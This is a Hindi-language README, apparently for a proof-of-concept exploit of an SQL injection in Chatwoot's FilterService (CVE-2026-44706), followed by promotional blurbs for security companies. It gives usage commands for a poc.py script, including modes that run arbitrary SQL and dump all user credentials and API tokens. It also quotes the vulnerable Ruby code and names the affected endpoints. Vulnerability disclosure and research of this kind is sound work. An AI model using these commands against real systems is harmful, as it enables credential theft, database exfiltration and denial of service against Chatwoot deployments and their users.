
FilterService में Chatwoot SQL injection
CVE-2026-44706 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Chatwoot के FilterService#lt_gt_filter_values में SQL इंजेक्शन भेद्यता, जो किसी भी प्रमाणित एजेंट को उपयोगकर्ता क्रेडेंशियल्स और API टोकन सहित पूरे PostgreSQL डेटाबेस को पढ़ने की अनुमति देती है। पूरा लेख यहाँ पढ़ें।
उपयोग:
# इंजेक्शन सत्यापित करें (बूलियन-आधारित)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# समय-आधारित पुष्टि
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# मनमाना SQL क्वेरी परिणाम निकालें
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# सभी उपयोगकर्ता क्रेडेंशियल्स और API टोकन डंप करें
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
app/services/filter_service.rb (पंक्ति 91) में, उपयोगकर्ता इनपुट को पैरामीटराइजेशन के बिना सीधे SQL में इंटरपोलेट किया जाता है:
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← उपयोगकर्ता इनपुट, कोई सैनिटाइजेशन नहीं
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← कच्चा इंटरपोलेशन
end
क्लास में हर दूसरा ऑपरेटर बाइंड पैरामीटर (:value_N) का उपयोग करता है। केवल is_greater_than और is_less_than संवेदनशील हैं।
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filterCWE-89 SQL इंजेक्शन। कोई भी प्रमाणित एजेंट/एडमिन:
pg_sleep() से डेटाबेस कनेक्शन समाप्त कर सकता है8.8 High CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
यह टूल केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनका परीक्षण करने की आपको स्पष्ट अनुमति है। लेखक इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
QuimeraX Intelligence एक उन्नत EASM और साइबर खतरा खुफिया मंच है जो जटिल प्रणालियों में महत्वपूर्ण कमजोरियों की पहचान करने में विशेषज्ञ है। मंच सक्रिय रूप से सुरक्षा खतरों की निगरानी, पहचान और अलर्ट करता है, पारदर्शिता और संभावित जोखिमों पर त्वरित प्रतिक्रिया सुनिश्चित करता है। ग्राहकों को तत्काल सूचनाएं और व्यापक रिपोर्ट प्राप्त होती हैं यदि उनकी प्रणालियां असुरक्षित पाई जाती हैं, जिससे वे सुरक्षात्मक कार्रवाई कर सकते हैं। और जानें
Hakai Security एक साइबर सुरक्षा कंपनी है जिसकी स्थापना सुरक्षा पेशेवरों द्वारा की गई है, जो तकनीकी उत्कृष्टता के लिए प्रतिबद्ध है। हम उन्नत पैठ परीक्षण, यथार्थवादी रेड टीम सिमुलेशन और सुरक्षित विकास प्रथाओं सहित अनुकूलित सुरक्षा समाधान प्रदान करते हैं ताकि हमारे ग्राहकों की संपत्तियों को विकसित होते साइबर खतरों से सक्रिय रूप से बचाया जा सके।
Hacking Club प्रशिक्षण मंच है जहां आप हमारी सुरक्षा परामर्श फर्म में काम करने वाले विशेषज्ञों द्वारा बनाए गए व्यावहारिक पाठों, लैब्स और चुनौतियों के माध्यम से साइबर सुरक्षा सीखते हैं: सीधे युद्ध के मैदान से आपके प्रशिक्षण तक। हैकिंग क्लब द्वारा इस रिपॉजिटरी में प्रस्तुत भेद्यता का अभ्यास करें! और जानें